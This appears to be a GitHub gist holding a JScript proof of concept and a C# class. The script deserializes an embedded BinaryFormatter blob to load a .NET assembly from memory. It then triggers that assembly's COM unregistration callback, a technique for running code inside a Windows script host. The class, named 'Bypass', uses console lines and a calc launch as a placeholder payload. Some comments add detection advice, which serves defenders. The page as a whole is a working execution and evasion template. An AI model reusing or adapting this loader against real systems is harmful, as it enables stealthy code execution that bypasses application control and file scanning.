@bohops
Forked from rvrsh3ll/subteegadget.cs
Created May 16, 2024 20:27
[JS File]
// Empty stub: it has no body on this page, so the setversion() call later in the script does nothing.
// NOTE(review): presumably a template hook for selecting the .NET runtime version; confirm against the generator that produced this file.
function setversion() {
}
// No-op logging stub; the argument is ignored and nothing visible on this page calls it.
function debug(s) {}
// Decodes the base64 text in b and returns it as a System.IO.MemoryStream positioned at offset 0.
// Every object is a COM-visible .NET class created through ActiveXObject, so the decoded bytes
// exist only in memory and are never written to disk by this function.
// Defender note: a Windows script host that instantiates System.* ProgIDs pulls the .NET runtime
// into its own process; CLR image loads (mscoree.dll / clr.dll) inside a script host are unusual
// and make a useful detection signal.
function base64ToStream(b) {
// The _2 / _4 suffixes are how COM interop exposes overloaded .NET methods to script.
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
// ba is reassigned from the ASCII bytes of the base64 text to the decoded binary.
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
// Byte count is derived from the text length: 3 output bytes per 4 base64 characters.
ms.Write(ba, 0, (length / 4) * 3);
// Rewind so the caller reads from the start of the decoded data.
ms.Position = 0;
return ms;
}
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAAA4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMApkgzXgAAAAAA"+
"AAAA4AACIQsBCwAABgAAAAYAAAAAAAA+JQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA6CQA"+
"AFMAAAAAQAAAmAIAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAABEBQAAACAAAAAGAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAmAIAAABA"+
"AAAABAAAAAgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAMAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAACAlAAAAAAAASAAAAAIABQCQIAAAWAQAAAEAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVgIoBAAACgAA"+
"cgEAAHAoBQAACgAAKjYAcjEAAHAoBQAACgAqNgByZwAAcCgFAAAKACo2AHKtAABwKAgAAAomKkJT"+
"SkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAAGQBAAAjfgAA0AEAAGgBAAAjU3RyaW5n"+
"cwAAAAA4AwAAuAAAACNVUwDwAwAAEAAAACNHVUlEAAAAAAQAAFgAAAAjQmxvYgAAAAAAAAACAAAB"+
"RxUAAAkAAAAA+iUzABYAAAEAAAAIAAAAAgAAAAQAAAACAAAACAAAAAUAAAABAAAAAgAAAAAACgAB"+
"AAAAAAAGACsAJAAGAH8AXwAGAJ8AXwAGAOIAwwAGAPYAJAAGAAgBwwAGACUBwwAKAFcBRAEAAAAA"+
"AQAAAAAAAQABAAEAEAAUAAAABQABAAEAUCAAAAAAhhgyAAoAAQBmIAAAAACWADgADgABAHQgAAAA"+
"AJYARgAOAAIAgiAAAAAAhgBWAAoAAwAAAAEAWwAAAAEAWwARADIAEwAZADIACgAhADIAGAAJADIA"+
"CgApAP4ADgAxADIACgA5ADIACgBBAF8BKAAuAAsALgAuABMANwBAADMAIwBDABsAHQBgADsAIwAE"+
"gAAAAAAAAAAAAAAAAAAAAAC9AAAABAAAAAAAAAAAAAAAAQAbAAAAAAAEAAAAAAAAAAAAAAABACQA"+
"AAAAAAAAADxNb2R1bGU+AHJlZ21lLmRsbABCeXBhc3MAbXNjb3JsaWIAU3lzdGVtAE9iamVjdAAu"+
"Y3RvcgBSZWdpc3RlckNsYXNzAFVuUmVnaXN0ZXJDbGFzcwBFeGVjAGtleQBTeXN0ZW0uUnVudGlt"+
"ZS5Db21waWxlclNlcnZpY2VzAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAUnVudGlt"+
"ZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAcmVnbWUAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZp"+
"Y2VzAENvbVZpc2libGVBdHRyaWJ1dGUAQ29uc29sZQBXcml0ZUxpbmUAQ29tUmVnaXN0ZXJGdW5j"+
"dGlvbkF0dHJpYnV0ZQBDb21VbnJlZ2lzdGVyRnVuY3Rpb25BdHRyaWJ1dGUAU3lzdGVtLkRpYWdu"+
"b3N0aWNzAFByb2Nlc3MAU3RhcnQAAAAAAC9JACAAYQBtACAAYQAgAGIAYQBzAGkAYwAgAEMATwBN"+
"ACAATwBiAGoAZQBjAHQAADVJACAAcwBoAG8AdQBsAGQAbgAnAHQAIAByAGUAYQBsAGwAeQAgAGUA"+
"eABlAGMAdQB0AGUAAUVJACAAcwBoAG8AdQBsAGQAbgAnAHQAIAByAGUAYQBsAGwAeQAgAGUAeABl"+
"AGMAdQB0AGUAIABlAGkAdABoAGUAcgAuAAEJYwBhAGwAYwAAAPe/XrkV9ipGnS6Wlwdbnw0ACLd6"+
"XFYZNOCJAyAAAQQAAQEOBCABAQgEIAEBAgUBAAEAAAQBAAAABQABEiEOCAEACAAAAAAAHgEAAQBU"+
"AhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQAAECUAAAAAAAAAAAAALiUAAAAgAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAACAlAAAAAAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/"+
"JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAA"+
"AAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAAA8AgAAAAAAAAAAAAA8AjQA"+
"AABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAAAAAAAAAAAAAAA"+
"AAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYA"+
"bwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEnAEAAAEAUwB0AHIAaQBu"+
"AGcARgBpAGwAZQBJAG4AZgBvAAAAeAEAAAEAMAAwADAAMAAwADQAYgAwAAAALAACAAEARgBpAGwA"+
"ZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAACAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBv"+
"AG4AAAAAADAALgAwAC4AMAAuADAAAAA0AAoAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAHIA"+
"ZQBnAG0AZQAuAGQAbABsAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAA"+
"ADwACgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAAByAGUAZwBtAGUALgBkAGwA"+
"bAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADAALgAwAC4AMAAuADAAAAA4"+
"AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAAEA1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3RlbS5S"+
"ZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA";
// Driver: deserializes the embedded object graph, invokes the resulting delegate to obtain an
// assembly object, then passes that assembly to RegistrationServices.UnregisterAssembly.
// Security-relevant points for a reviewer or detection engineer:
//  - BinaryFormatter.Deserialize on untrusted bytes is inherently unsafe: type names in the stream
//    decide which objects and delegates get constructed. Here the stream carries a serialized
//    delegate chain ending in Assembly.Load(Byte[]) together with an embedded PE image (regme.dll).
//  - The assembly is loaded from memory, so there is no DLL on disk for file-based scanning;
//    rely on script-content scanning (AMSI), CLR load telemetry in script hosts, and
//    application-control policy for wscript/cscript/mshta instead.
//  - UnregisterAssembly runs the assembly's [ComUnregisterFunction] method inside this script host process.
// entry_class is assigned but not read by any statement below.
var entry_class = 'Bypass';
setversion();
var stm = base64ToStream(serialized_obj);
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
// Deserialize_2 is the COM-exposed name of a Deserialize overload; d is the rebuilt delegate.
var d = fmt.Deserialize_2(stm);
// A single undefined entry is the only argument handed to the delegate.
al.Add(undefined);
var rgsvcs = new ActiveXObject("System.Runtime.InteropServices.RegistrationServices");
// The delegate's return value is treated as the loaded assembly.
var assembly = d.DynamicInvoke(al.ToArray());
var res = rgsvcs.UnregisterAssembly(assembly);
// Prints the value returned by UnregisterAssembly to the script host's standard output.
WScript.StdOut.WriteLine(res);
[CS Class Example]
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
// Minimal COM-visible class whose only purpose is to show that COM (un)registration callbacks run code.
// NOTE(review): the class, method names and strings appear to match the regme.dll image embedded in
// the script on this page; confirm by decompiling before relying on this listing as its source.
// Defender note: methods marked [ComRegisterFunction] / [ComUnregisterFunction] execute inside whichever
// process performs the registration call, so treat COM registration of untrusted assemblies as code execution.
[ComVisible(true)]
public class Bypass
{
// Constructor only writes a marker line to the console.
public Bypass() { Console.WriteLine("I am a basic COM Object"); }
[ComRegisterFunction] // Called when the assembly is registered for COM
public static void RegisterClass(string key)
{
Console.WriteLine("I shouldn't really execute");
}
[ComUnregisterFunction] // Called when the assembly is unregistered for COM (not on registration failure)
public static void UnRegisterClass(string key)
{
Console.WriteLine("I shouldn't really execute either.");
}
// Starts "calc" as a visible proof-of-execution marker; nothing in this class calls Exec().
public void Exec() { System.Diagnostics.Process.Start("calc"); }
}